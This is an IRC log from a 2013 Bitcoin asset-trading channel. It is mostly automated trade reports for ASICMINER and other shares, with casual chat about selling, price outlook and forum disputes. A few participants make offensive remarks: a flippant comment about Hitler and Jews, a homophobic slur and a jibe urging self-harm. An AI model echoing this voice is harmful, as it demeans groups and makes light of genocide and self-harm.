20 20:32:11 [BTCTC] [ASICMINER-PT] 1 @ 2.1875 BTC [-] May 20 20:32:39 jcpham: i respect that. guts often know things our conscious minds don't. May 20 20:32:47 [MPEX] [S.MPOE] 26900 @ 0.00067089 = 18.0469 BTC [+] May 20 20:32:54 i wish you the nest May 20 20:32:57 maybe it's the flora in your gut, it noes more than your brains! May 20 20:32:58 *best May 20 20:33:13 jcpham: i'm out of assets too and BTC, except for my cold storage egg May 20 20:33:26 mostly assets i'm talking about May 20 20:33:31 might be worst time ever to exit May 20 20:33:37 shrug May 20 20:33:39 meh May 20 20:33:45 it's all hindsight. May 20 20:33:47 [BTCTC] [ASICMINER-PT] 2 @ 2.187 = 4.374 BTC [-] May 20 20:33:49 kick yourself later. May 20 20:33:51 i wish you the nest is not so bad May 20 20:33:52 why you all selling? May 20 20:34:14 dumping is what i'm doing May 20 20:34:14 Chaaang-Noi!*@* added to ignore list. May 20 20:34:18 all shares.lowest price May 20 20:34:24 time to go May 20 20:34:32 i did what jcpham did for the same reasons. course it was self-fulfilling prophecy as I dumped sdice. May 20 20:34:35 i won enough May 20 20:35:04 [HAVELOCK] [ASICM] 226 @ 0.02149 = 4.8567 BTC [+] May 20 20:35:30 i'm more concerned with my locality May 20 20:35:40 which isn't the usa May 20 20:36:04 [BTCTC] [S.DICE-PT] 6 @ 0.00279 = 0.0167 BTC [+] May 20 20:36:23 ripple. **** BEGIN LOGGING AT Tue May 21 01:05:49 2013 May 21 01:06:59 ;;ticker May 21 01:07:00 BTCUSD ticker | Best bid: 121.30114, Best ask: 121.69999, Bid-ask spread: 0.39885, Last trade: 121.70000, 24 hour volume: 17266.03033417, 24 hour low: 120.10000, 24 hour high: 123.69000, 24 hour vwap: 122.32473 May 21 01:07:10 ahh this beautiful stability. May 21 01:07:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.021095 = 0.0633 BTC [+] May 21 01:08:44 [MPEX] [S.MPOE] 1000 @ 0.00066023 = 0.6602 BTC [-] May 21 01:09:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.021095 = 0.211 BTC [+] May 21 01:10:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.021095 = 0.0422 BTC [+] May 21 01:12:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.021094 = 0.0633 BTC [-] May 21 01:14:23 mircea_popescu: temporary consolidation on the long winding road of uncertainty May 21 01:15:04 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2611 BTC [+] May 21 01:16:03 [HAVELOCK] [ASICM] 231 @ 0.0217512 = 5.0245 BTC [+] May 21 01:16:23 Change the title to AM, noobs pay again! May 21 01:16:28 until next time May 21 01:16:52 [BTCTC] [COGNITIVE] 1 @ 0.215016 BTC [-] May 21 01:17:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.021094 = 0.2109 BTC [-] May 21 01:22:02 [HAVELOCK] [ASICM] 9 @ 0.02165 = 0.1949 BTC [-] May 21 01:22:04 [HAVELOCK] [ASICM] 500 @ 0.02160001 = 10.8 BTC [-] May 21 01:25:42 jborkl i'm not really much inviolved with am. May 21 01:26:18 that aside, i'm sure they'll be paying someone. May 21 01:27:03 [HAVELOCK] [ASICM] 127 @ 0.0215 = 2.7305 BTC [-] May 21 01:27:04 [HAVELOCK] [ASICM] 73 @ 0.0215 = 1.5695 BTC [-] May 21 01:27:05 [HAVELOCK] [ASICM] 11 @ 0.0215 = 0.2365 BTC [-] May 21 01:27:26 [BTCTC] [TAT.ASICMINER] 46 @ 0.021011 = 0.9665 BTC [-] May 21 01:27:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.021094 = 0.1477 BTC [+] May 21 01:27:35 [BTCTC] [TAT.ASICMINER] 23 @ 0.021095 = 0.4852 BTC [+] May 21 01:27:39 [BTCTC] [TAT.ASICMINER] 37 @ 0.0212 = 0.7844 BTC [+] May 21 01:27:46 [BTCTC] [TAT.ASICMINER] 57 @ 0.0213 = 1.2141 BTC [+] May 21 01:27:53 [BTCTC] [TAT.ASICMINER] 42 @ 0.021333 = 0.896 BTC [+] May 21 01:28:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.021199 BTC [-] May 21 01:29:37 [BTCTC] [ASICMINER-PT] 1 @ 2.100421 BTC [-] May 21 01:31:15 [BTCTC] [BASIC-MINING] 1 @ 0.499 BTC [-] May 21 01:31:32 [BTCTC] [BTC-BOND] 1 @ 0.010096 BTC [-] May 21 01:33:02 [HAVELOCK] [ASICM] 11 @ 0.0217512 = 0.2393 BTC [+] May 21 01:33:03 [HAVELOCK] [ASICM] 81 @ 0.0217512 = 1.7618 BTC [+] May 21 01:33:05 [HAVELOCK] [ASICM] 8 @ 0.0217512 = 0.174 BTC [+] May 21 01:33:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.021199 = 0.1272 BTC [-] May 21 01:34:03 [HAVELOCK] [ASICM] 451 @ 0.0217512 = 9.8098 BTC [+] May 21 01:34:37 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [+] May 21 01:34:56 [MPEX] [S.MPOE] 8900 @ 0.00065924 = 5.8672 BTC [-] May 21 01:34:58 [MPEX] [S.MPOE] 9100 @ 0.00065942 = 6.0007 BTC [+] May 21 01:35:02 [HAVELOCK] [ASICM] 49 @ 0.0217 = 1.0633 BTC [-] May 21 01:35:04 [MPEX] [S.MPOE] 50700 @ 0.00066442 = 33.6861 BTC [+] May 21 01:36:02 [HAVELOCK] [ASICM] 206 @ 0.02179 = 4.4887 BTC [+] May 21 01:39:34 [BTCTC] [TAT.ASICMINER] 37 @ 0.0214 = 0.7918 BTC [+] May 21 01:40:14 [BTCTC] [ASICMINER-PT] 1 @ 2.159999 BTC [-] May 21 01:41:03 [HAVELOCK] [ASICM] 7 @ 0.0217512 = 0.1523 BTC [-] May 21 01:41:24 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [+] May 21 01:42:19 [BTCTC] [ASICMINER-PT] 1 @ 2.1644 BTC [+] May 21 01:42:30 [BTCTC] [ASICMINER-PT] 3 @ 2.1645 = 6.4935 BTC [+] May 21 01:42:39 [BTCTC] [ASICMINER-PT] 1 @ 2.16487 BTC [+] May 21 01:42:44 [BTCTC] [ASICMINER-PT] 1 @ 2.1659 BTC [+] May 21 01:42:52 [BTCTC] [ASICMINER-PT] 3 @ 2.1659 = 6.4977 BTC [+] May 21 01:43:33 [BTCTC] [TAT.ASICMINER] 24 @ 0.0214 = 0.5136 BTC [+] May 21 01:44:29 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [-] May 21 01:44:33 [BTCTC] [ASICMINER-PT] 1 @ 2.1658 BTC [+] May 21 01:46:29 [BTCTC] [ASICMINER-PT] 1 @ 2.1658 BTC [+] May 21 01:46:37 [BTCTC] [ASICMINER-PT] 5 @ 2.166 = 10.83 BTC [+] May 21 01:51:02 [HAVELOCK] [ASICM] 47 @ 0.0217 = 1.0199 BTC [-] May 21 01:54:02 [HAVELOCK] [ASICM] 47 @ 0.02175119 = 1.0223 BTC [+] May 21 01:54:04 [HAVELOCK] [ASICM] 186 @ 0.0217512 = 4.0457 BTC [+] May 21 01:54:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.0214 = 0.0642 BTC [+] May 21 01:54:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.0214 = 0.4922 BTC [+] May 21 01:58:36 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] May 21 01:59:26 [BTCTC] [ASICMINER-PT] 1 @ 2.165 BTC [-] May 21 01:59:39 [BTCTC] [ASICMINER-PT] 5 @ 2.165 = 10.825 BTC [-] May 21 02:02:04 [BTCTC] [BITVPS] 14 @ 0.000697 = 0.0098 BTC [+] May 21 02:06:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.020821 = 0.0416 BTC [-] May 21 02:08:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.020821 = 0.0625 BTC [-] May 21 02:10:00 mod6 May 21 02:10:17 ;;seen mircea_popescu May 21 02:10:22 ;;gribble May 21 02:10:27 mircea_popescu was last seen in #bitcoin-assets 44 minutes and 7 seconds ago: that aside, i'm sure they'll be paying someone. May 21 02:10:27 yes I am gribble. why do you keep bothering me? May 21 02:10:29 dafuck. May 21 02:10:54 mircea_popescu: can I speak with you via pm for a second? May 21 02:11:02 please do. May 21 02:11:22 pm = wherethefuckissmickles! May 21 02:13:40 ThickAsThieves maybe he just wants to tell me random insane shit i said x time ago finally made sense to him. May 21 02:14:25 who knows May 21 02:14:29 well, you do May 21 02:15:11 mp i'm wondering that now we are stable at 120ish, after all the bubbliness May 21 02:15:16 where you think we're headed May 21 02:15:26 it seems to me the bottom his risen May 21 02:15:31 has* May 21 02:15:34 perhaps. May 21 02:15:50 well, you know... it's bitcoin. the only way is up (up! up!) May 21 02:16:15 i do think the next sign of up up up will give us another bubble May 21 02:16:39 but just wondering if you have any fundamental insight to the "natural" price in the next few mos May 21 02:16:49 reasonably, the long term prospect of bitcoin is up. the long term prospect of volatility is down. May 21 02:17:00 this aside... turbulence ahoy. May 21 02:17:46 ;;ticker May 21 02:17:47 BTCUSD ticker | Best bid: 122.00000, Best ask: 122.19999, Bid-ask spread: 0.19999, Last trade: 122.20000, 24 hour volume: 17188.92127316, 24 hour low: 120.10000, 24 hour high: 123.69000, 24 hour vwap: 122.31359 May 21 02:17:56 ;;asks 130 May 21 02:18:03 There are currently 22499.007 bitcoins offered at or under 130.0 USD, worth 2863039.22976 USD in total. | Data vintage: 0.0190 seconds May 21 02:18:44 ;;nethash May 21 02:18:44 80422.9190067 May 21 02:18:49 yeesh May 21 02:18:55 ThickAsThieves maybe he just wants to tell me random insane shit i said x time ago finally made sense to him. << pretty much, i don't want to spam the channel. mp is good people for this very reason. May 21 02:19:20 the channel lives through much worse daily May 21 02:19:30 but i can respect you wanting privacy May 21 02:19:33 s'all good May 21 02:20:23 the channel lives through much worse daily << it's kind of funny to me, this. May 21 02:20:39 more than a year ago i left bitcoin-otc over a dispute about moderation. May 21 02:20:55 that channel has gone pretty much to shit, in spite of a lot of rules, a lot of dicking about and a lot of nonsense. May 21 02:21:03 [HAVELOCK] [ASICM] 1 @ 0.0217512 BTC [+] May 21 02:21:09 i popped in there like once May 21 02:21:12 this channel is pretty much the best venue in all of bitcoin, in spite of there being no mods and nobody giving a shit May 21 02:21:13 not for me May 21 02:21:25 the free market proves its superiority again and again and again May 21 02:21:33 yet people NEVER are willing to just do the right thing for fucks sake. May 21 02:21:57 we must learn for ourselves sometimes May 21 02:22:09 to hear something isnt always the same as understanding it May 21 02:22:14 i guess so. May 21 02:22:25 i certainly ignored some things i shouldnt have early on May 21 02:22:32 but i learned those lessons forever May 21 02:22:37 by fuckingg up May 21 02:22:39 or so you think :) May 21 02:22:42 indeed May 21 02:22:43 hehe May 21 02:23:11 like elation makes me so uncomforable now May 21 02:23:18 wait wut ? May 21 02:23:21 whethe ri tbe mine or someone elses May 21 02:23:31 (regarding finance) May 21 02:23:35 :p May 21 02:23:39 like everyone clamoring for AM May 21 02:23:50 i thought you left out an f there or something May 21 02:24:17 or talking about how bitcoin will be $500 soon once it had hit $250 May 21 02:24:48 i mean i could go on and on the things i've learned May 21 02:24:50 in here May 21 02:24:55 and all around May 21 02:25:01 and i still need to learn more May 21 02:25:12 ThickAsThieves that was so funny, how keiser deleted all his content May 21 02:25:18 i laughed for days May 21 02:25:21 hehe May 21 02:25:45 hell i even bought difficulty futures May 21 02:25:47 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [-] May 21 02:25:54 you know, the one annoying thing hitler did was... he didn;t simply kill all the jews he could get. May 21 02:26:05 he killed the cool jews. at the time european jews were mostly hasiddic May 21 02:26:18 which happens to be a pretty smart way to look at life and everything. May 21 02:26:29 one of the chief points thereof being that if you ain't laughing you ain't got it. May 21 02:26:56 ive never known many jews May 21 02:27:05 like 2 in grade school May 21 02:27:21 well 10yo people aren't particularly jewish or anything else. just kids. May 21 02:27:54 they taught me to dreidel what are you talkin bought May 21 02:27:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.021399 BTC [+] May 21 02:27:56 bout May 21 02:27:58 hehe May 21 02:28:37 one jewish kid tried to pull baseball card scams on me May 21 02:29:09 baseball card scams ?! May 21 02:29:20 making something out to be super old May 21 02:29:26 like some honus wagner card May 21 02:29:28 but not May 21 02:29:36 and trying to get me to buy it May 21 02:29:45 hahaha. i forgot those cards were like kid currency May 21 02:29:50 so he was randomly doing some collectible radio show with his dad once May 21 02:29:54 and i called in May 21 02:29:58 and descrivbed the card May 21 02:30:03 and asked for a valuation on air May 21 02:30:23 i forget so much about childhood, but i remember that May 21 02:30:31 lmao May 21 02:31:28 yeah as kids we dealth in cards, candy, and cassingles May 21 02:31:32 those were the days May 21 02:31:36 lol May 21 02:31:42 dealt* May 21 02:33:33 [MPEX] [S.MPOE] 15300 @ 0.00065885 = 10.0804 BTC [-] May 21 02:35:03 [HAVELOCK] [ASICM] 137 @ 0.02175 = 2.9798 BTC [-] May 21 02:35:15 [BTCTC] [ASICMINER-PT] 2 @ 2.145 = 4.29 BTC [-] May 21 02:35:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.021399 = 0.0856 BTC [+] May 21 02:37:15 [MPEX] [S.MPOE] 23300 @ 0.00065832 = 15.3389 BTC [-] May 21 02:37:17 [MPEX] [S.MPOE] 6250 @ 0.00066442 = 4.1526 BTC [+] May 21 02:37:19 [MPEX] [S.MPOE] 10550 @ 0.00067329 = 7.1032 BTC [+] May 21 02:37:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.0214 = 0.1284 BTC [+] May 21 02:37:30 [MPEX] [S.MPOE] 21887 @ 0.00067366 = 14.7444 BTC [+] May 21 02:37:31 [MPEX] [S.MPOE] 14816 @ 0.00067463 = 9.9953 BTC [+] May 21 02:37:43 [MPEX] [S.MPOE] 17100 @ 0.00067534 = 11.5483 BTC [+] May 21 02:37:45 [MPEX] [S.MPOE] 15150 @ 0.0006756 = 10.2353 BTC [+] May 21 02:37:57 [MPEX] [S.MPOE] 10947 @ 0.00067599 = 7.4001 BTC [+] May 21 02:38:00 [MPEX] [S.MPOE] 653 @ 0.00067599 = 0.4414 BTC [+] May 21 02:38:02 [MPEX] [S.MPOE] 19644 @ 0.00067636 = 13.2864 BTC [+] May 21 02:38:04 [MPEX] [S.MPOE] 18400 @ 0.00067666 = 12.4505 BTC [+] May 21 02:38:06 [MPEX] [S.MPOE] 10450 @ 0.0006769 = 7.0736 BTC [+] May 21 02:38:17 [MPEX] [S.MPOE] 28868 @ 0.00067734 = 19.5535 BTC [+] May 21 02:40:37 [MPEX] [S.MPOE] 7400 @ 0.00068 = 5.032 BTC [+] May 21 02:40:50 [BTCTC] [BASIC-MINING] 1 @ 0.499 BTC [-] May 21 02:46:04 [HAVELOCK] [ASICM] 202 @ 0.02175 = 4.3935 BTC [-] May 21 02:47:51 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [+] May 21 02:50:36 [BTCTC] [ASICMINER-PT] 1 @ 2.166 BTC [+] May 21 02:54:09 [BTCTC] [ASICMINER-PT] 2 @ 2.166 = 4.332 BTC [+] May 21 02:57:03 [HAVELOCK] [ASICM] 61 @ 0.02175 = 1.3268 BTC [-] May 21 02:58:01 [BTCTC] [ASICMINER-PT] 1 @ 2.166 BTC [+] May 21 03:00:42 [BTCTC] [TAT.ASICMINER] 64 @ 0.0214 = 1.3696 BTC [+] May 21 03:03:03 [HAVELOCK] [ASICM] 9 @ 0.0217512 = 0.1958 BTC [+] May 21 03:03:05 [HAVELOCK] [ASICM] 11 @ 0.0217512 = 0.2393 BTC [+] May 21 03:06:03 [HAVELOCK] [ASICM] 227 @ 0.0217512 = 4.9375 BTC [+] May 21 03:06:47 http://trilema.com/2013/the-froth-of-our-days/ May 21 03:06:52 ThickAsThieves thestringpuller ^ May 21 03:06:55 you're both famouser nao. May 21 03:07:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0214 BTC [+] May 21 03:13:13 [BTCTC] [TAT.ASICMINER] 50 @ 0.0214 = 1.07 BTC [+] May 21 03:14:15 [BTCTC] [ASICMINER-PT] 10 @ 2.16699 = 21.6699 BTC [+] May 21 03:17:03 [HAVELOCK] [ASICM] 6 @ 0.0217512 = 0.1305 BTC [+] May 21 03:22:04 [HAVELOCK] [ASICM] 169 @ 0.02175 = 3.6758 BTC [-] May 21 03:22:12 [BTCTC] [TAT.ASICMINER] 191 @ 0.0214 = 4.0874 BTC [+] May 21 03:23:03 [HAVELOCK] [ASICM] 148 @ 0.0217512 = 3.2192 BTC [+] May 21 03:23:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0212 BTC [-] May 21 03:25:16 [BTCTC] [ASICMINER-PT] 2 @ 2.17 = 4.34 BTC [+] May 21 03:27:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.021489 = 0.3008 BTC [+] May 21 03:30:31 superservant indeed. go show though. May 21 03:33:26 [BTCTC] [ASICMINER-PT] 1 @ 2.17 BTC [+] May 21 03:34:03 [HAVELOCK] [ASICM] 137 @ 0.02178998 = 2.9852 BTC [+] May 21 03:34:36 it's a fact tho. for the past year or so kakobrekla has been acting the superservant, and as a result the chan came to dominate bitcoin discussion. May 21 03:34:55 and in general, whenever someone is willing to play the superservant, his thing will be a hub of conversation. May 21 03:35:04 there's a reason people met in inns historically. May 21 03:35:22 mircea_popescu: inns and coffeehouses May 21 03:35:34 for discussion May 21 03:35:37 well teahouses to be fair to the actually larger azn tradition May 21 03:35:38 but yet. May 21 03:35:40 yes May 21 03:35:47 and if there's a superservant avatar, the gheisha is it. May 21 03:36:03 *good show, shit. stupid hand is still learning to type. May 21 03:36:11 did you have ti broken ? May 21 03:36:32 just bad sprain. May 21 03:37:49 mircea_popescu: to go along the avenue of inn's teahouses coffeehouses et al. May 21 03:37:56 I wish we had a newsbot or some avenue. May 21 03:38:08 As coffeehouses were frequented a lot for the latest news. May 21 03:38:18 i don;'t think that can work as an automated thing. i think it has to be curated May 21 03:38:28 hence i've been pushing for people to make blogs since forever. May 21 03:38:40 it's a rare skill tho. and drudge is old. May 21 03:38:49 well lots of drudge in general May 21 03:38:53 we need a new eccentric faggot in a hat. May 21 03:39:04 [HAVELOCK] [ASICM] 126 @ 0.02178998 = 2.7455 BTC [+] May 21 03:39:10 i try to use /r/bitcoin May 21 03:39:16 but it has a lot of wankery May 21 03:39:32 it has so much wankery in fact that it's not usually on the lists of what i have summarized May 21 03:39:41 as it doesn't seem to justify the time expenditure May 21 03:40:04 [HAVELOCK] [ASICM] 1 @ 0.02178999 BTC [+] May 21 03:40:13 hey, in the forums, what does it mean when your name is orangered? May 21 03:40:39 no idea May 21 03:41:03 [HAVELOCK] [ASICM] 99 @ 0.02178999 = 2.1572 BTC [+] May 21 03:41:49 misterbigg orangered me. May 21 03:41:52 twat May 21 03:42:04 [HAVELOCK] [ASICM] 92 @ 0.0218 = 2.0056 BTC [+] May 21 03:42:20 uh what ? May 21 03:42:49 truffles how do you know that? May 21 03:42:54 did you read a manual of some sort? May 21 03:43:28 http://imgur.com/7oOo1eE May 21 03:44:30 o0 hey, do ignores now give people a cool backing for their name ? May 21 03:44:30 All I did was back up what he said. May 21 03:44:33 word. May 21 03:46:03 [HAVELOCK] [ASICM] 140 @ 0.0218512 = 3.0592 BTC [+] May 21 03:50:00 [BTCTC] [ASICMINER-PT] 11 @ 2.179 = 23.969 BTC [+] May 21 03:50:54 [BTCTC] [ASICMINER-PT] 6 @ 2.18 = 13.08 BTC [+] May 21 03:51:04 [HAVELOCK] [ASICM] 372 @ 0.0218512 = 8.1286 BTC [+] May 21 03:51:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.021489 BTC [+] May 21 03:51:41 [BTCTC] [ASICMINER-PT] 3 @ 2.187 = 6.561 BTC [+] May 21 03:51:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.021489 = 0.086 BTC [+] May 21 03:51:49 [BTCTC] [ASICMINER-PT] 5 @ 2.187 = 10.935 BTC [+] May 21 03:52:04 [HAVELOCK] [ASICM] 2 @ 0.0219512 = 0.0439 BTC [+] May 21 03:52:06 liked the blog mp, I'd be interested in more before-my-time-excerpts in the future May 21 03:52:11 [BTCTC] [TAT.ASICMINER] 14 @ 0.021489 = 0.3008 BTC [+] May 21 03:52:30 [BTCTC] [ASICMINER-PT] 4 @ 2.1875 = 8.75 BTC [+] May 21 03:53:11 [BTCTC] [ASICMINER-PT] 4 @ 2.19 = 8.76 BTC [+] May 21 03:53:14 i guess i should probly pour through old trilema posts sometime May 21 03:53:17 as you keep jogging my memory im sure it'll happen May 21 03:53:25 it's pore you know May 21 03:53:42 is it? heh May 21 03:53:58 there goes my writing career May 21 03:53:58 yeah, to pour a liquid, to pore over a text/collection May 21 03:54:04 [BTCTC] [TAT.ASICMINER] 35 @ 0.02169 = 0.7592 BTC [+] May 21 03:54:05 domn May 21 03:54:11 don't worry, hemingway couldn't spell either May 21 03:54:38 [BTCTC] [ASICMINER-PT] 1 @ 2.19 BTC [+] May 21 03:54:42 i also type faster than my fingers can handle May 21 03:55:15 causing more errors than most May 21 03:56:11 [BTCTC] [ASICMINER-PT] 1 @ 2.19 BTC [+] May 21 03:57:21 [BTCTC] [TAT.ASICMINER] 30 @ 0.02169 = 0.6507 BTC [+] May 21 03:59:04 [HAVELOCK] [ASICM] 1 @ 0.0219512 BTC [+] May 21 03:59:20 http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ May 21 03:59:23 ahaha look what i found May 21 04:03:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.02169 = 0.4338 BTC [+] May 21 04:05:06 [HAVELOCK] [ASICM] 13 @ 0.0219512 = 0.2854 BTC [+] May 21 04:09:03 [HAVELOCK] [ASICM] 496 @ 0.0219512 = 10.8878 BTC [+] May 21 04:09:42 thats how its done kids http://charts.mql5.com/1/599/usdjpy-m15-worth-ltd-venetfx-6.png May 21 04:10:04 [HAVELOCK] [ASICM] 372 @ 0.02225 = 8.277 BTC [+] May 21 04:11:03 [HAVELOCK] [ASICM] 88 @ 0.02225 = 1.958 BTC [+] May 21 04:11:31 da fuck, looks just like s.mpoe May 21 04:13:33 is truffles butthurt that he isnt making friends? May 21 04:14:55 what is teh beef then May 21 04:15:04 you seem to be raging against teh -assets May 21 04:15:14 he is ? May 21 04:15:18 and i thought truffles was a girl anyway May 21 04:15:51 every time I look in there there is an emo comment May 21 04:15:59 'everyone here sayys im a troll :(' May 21 04:16:24 cutting is the answe. May 21 04:16:28 [BTCTC] [ASICMINER-PT] 3 @ 2.195 = 6.585 BTC [+] May 21 04:16:59 or quoting a complete shitbag like gmax May 21 04:17:14 [BTCTC] [ASICMINER-PT] 1 @ 2.195 BTC [+] May 21 04:18:07 he is only incidentally in there May 21 04:18:19 much like his "involvement" in bitcoin generally. May 21 04:18:27 [BTCTC] [TAT.ASICMINER] 55 @ 0.02169 = 1.193 BTC [+] May 21 04:18:34 gmax is one of thr Almighty Devs May 21 04:18:46 that's a myth. May 21 04:18:55 ya? May 21 04:18:56 the gspot exists tho. May 21 04:19:14 the gmax spot May 21 04:19:26 obv truffles is upset about something May 21 04:19:56 he's mad we dont like hockey May 21 04:20:55 aha May 21 04:21:00 he's from finland May 21 04:21:06 no way ?! May 21 04:21:09 say no more May 21 04:21:24 dude what sorcery did the russians do to finland May 21 04:22:23 anyway, this is all the fun i can take for one day. see you all later. May 21 04:23:04 [HAVELOCK] [ASICM] 40 @ 0.02225 = 0.89 BTC [+] May 21 04:23:06 [HAVELOCK] [ASICM] 730 @ 0.022 = 16.06 BTC [-] May 21 04:23:06 [HAVELOCK] [ASICM] 500 @ 0.0219512 = 10.9756 BTC [-] May 21 04:23:09 [BTCTC] [TAT.ASICMINER] 25 @ 0.02141 = 0.5353 BTC [-] **** BEGIN LOGGING AT Tue May 21 12:09:53 2013 **** ENDING LOGGING AT Tue May 21 12:10:37 2013 **** BEGIN LOGGING AT Tue May 21 12:11:21 2013 May 21 12:11:44 [BTCTC] [TAT.ASICMINER] 31 @ 0.029499 = 0.9145 BTC [+] May 21 12:12:24 [BTCTC] [ASICMINER-PT] 1 @ 2.708 BTC [-] May 21 12:12:47 [BTCTC] [TAT.ASICMINER] 61 @ 0.0295 = 1.7995 BTC [+] May 21 12:13:50 [BTCTC] [ASICMINER-PT] 4 @ 2.709 = 10.836 BTC [+] May 21 12:14:27 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [+] May 21 12:14:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.03 = 0.3 BTC [+] May 21 12:14:39 [BTCTC] [TAT.ASICMINER] 13 @ 0.03 = 0.39 BTC [+] May 21 12:15:54 [BTCTC] [TAT.ASICMINER] 7 @ 0.03 = 0.21 BTC [+] May 21 12:16:02 ahaha this is grand. May 21 12:16:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.03 = 0.09 BTC [+] May 21 12:16:08 [BTCTC] [TAT.ASICMINER] 50 @ 0.028017 = 1.4009 BTC [-] May 21 12:16:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.028016 = 0.5603 BTC [-] May 21 12:16:21 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [+] May 21 12:16:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.028015 = 0.2802 BTC [-] May 21 12:16:37 [BTCTC] [ASICMINER-PT] 1 @ 2.709 BTC [+] May 21 12:16:46 [BTCTC] [ASICMINER-PT] 8 @ 2.71 = 21.68 BTC [+] May 21 12:18:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.027999 = 0.56 BTC [-] May 21 12:18:36 mircea_popescu: ohai May 21 12:18:39 Yeah... May 21 12:18:40 also what is grand May 21 12:18:42 [BTCTC] [TAT.ASICMINER] 97 @ 0.028 = 2.716 BTC [+] May 21 12:18:50 davout the 3 btc per asicminer share May 21 12:19:06 ah, yeah i saw that, thought to myself "where do i short this stuff" May 21 12:19:14 Herdtrain is coming. You may want to step back. May 21 12:19:33 wait May 21 12:19:34 wtf? May 21 12:19:35 its almost 3? May 21 12:19:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [+] May 21 12:19:39 It is 3. May 21 12:19:40 I sold my shares waaaaaaaaay too early May 21 12:19:43 bitcoin is fun. May 21 12:20:23 Not for the people who are bound to get hurt from this. May 21 12:20:36 yes, yes it is. May 21 12:20:40 therer is no education without pain. May 21 12:20:49 people like to pretend this isn't the case, but it is. May 21 12:20:53 Yeah, but it isn't _fun_. May 21 12:21:09 well May 21 12:21:12 if it goes to 10 May 21 12:21:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.028 = 0.364 BTC [+] May 21 12:21:23 I could theoretically sell all the DMC AM shares May 21 12:21:26 furuknap for some broken definitions of fun. May 21 12:21:29 pay out a dividend of 1BTC May 21 12:21:34 and then close all shares forever. May 21 12:21:43 Hehe, yeah, pain can be fun, but usually not in the stock market. May 21 12:21:56 DMC? May 21 12:22:10 [BTCTC] [B.YABMC] 10 @ 0.0146 = 0.146 BTC [-] May 21 12:22:10 Diablo Mining Company? May 21 12:22:16 [BTCTC] [B.YABMC] 2 @ 0.0145 = 0.029 BTC [-] May 21 12:22:18 furuknap: yes May 21 12:22:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.028 = 0.056 BTC [+] May 21 12:22:22 [BTCTC] [B.YABMC] 8 @ 0.0145 = 0.116 BTC [-] May 21 12:22:39 [BTCTC] [ASICMINER-PT] 2 @ 2.659 = 5.318 BTC [-] May 21 12:22:48 [BTCTC] [B.YABMC] 3 @ 0.014215 = 0.0426 BTC [-] May 21 12:23:15 [BTCTC] [ASICMINER-PT] 2 @ 2.659 = 5.318 BTC [-] May 21 12:23:58 btw, all 1000 btcmc shares that DMC has, I'll sell those for 500 BTC if anyone wants to take me up on those May 21 12:24:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.0333 = 0.333 BTC [+] May 21 12:24:26 Put them on BTCT and sell for market. Let's have some fun! May 21 12:25:39 [BTCTC] [TAT.ASICMINER] 21 @ 0.0333 = 0.6993 BTC [+] May 21 12:26:45 OMG I'm deaf! May 21 12:26:51 Oh, wait, just out of battery on my headset. May 21 12:27:02 [BTCTC] [TAT.ASICMINER] 21 @ 0.0333 = 0.6993 BTC [+] May 21 12:27:03 furuknap: I want to get rid of them and not have to manage them anymore May 21 12:27:09 [BTCTC] [TAT.ASICMINER] 8 @ 0.0333 = 0.2664 BTC [+] May 21 12:27:28 Auction seems to be the way to do that. Hundreds of shares sold very quickly. May 21 12:28:03 [BTCTC] [ASICMINER-PT] 1 @ 2.659 BTC [-] May 21 12:28:08 [BTCTC] [S.MPOE-PT] 1000 @ 0.000666 = 0.666 BTC [+] May 21 12:28:24 The problem, of course, is that if the share pops while you're auctioning, you may get trouble collecting. May 21 12:28:26 furuknap: yochdog is forcing me to sell to a single person May 21 12:28:39 no, I dont think Ill have trouble May 21 12:28:42 all bids will be binding May 21 12:28:58 any attempt to not pay will end up with your forum account either banned or scammer tagged May 21 12:29:16 Sure, but if the share drops to 1.0, people will run for the hills, never looking back, and definitely never looking back at losing 2.0 per share. May 21 12:29:27 what share? May 21 12:29:31 AM. May 21 12:29:40 what does AM have to do with it? May 21 12:29:48 we're talking BTCMC here May 21 12:29:57 Ah, sorry, I misread you. Thought you wanted to sell AM shares... May 21 12:30:28 [BTCTC] [ASICMINER-PT] 3 @ 2.659 = 7.977 BTC [-] May 21 12:30:40 [BTCTC] [S.DICE-PT] 200 @ 0.00274 = 0.548 BTC [+] May 21 12:30:42 no May 21 12:30:46 AM at 3.33 now on TAT PT. Madness never ends. May 21 12:30:48 I'll trade DMC shares for those May 21 12:30:55 11 DMC for 1 AM May 21 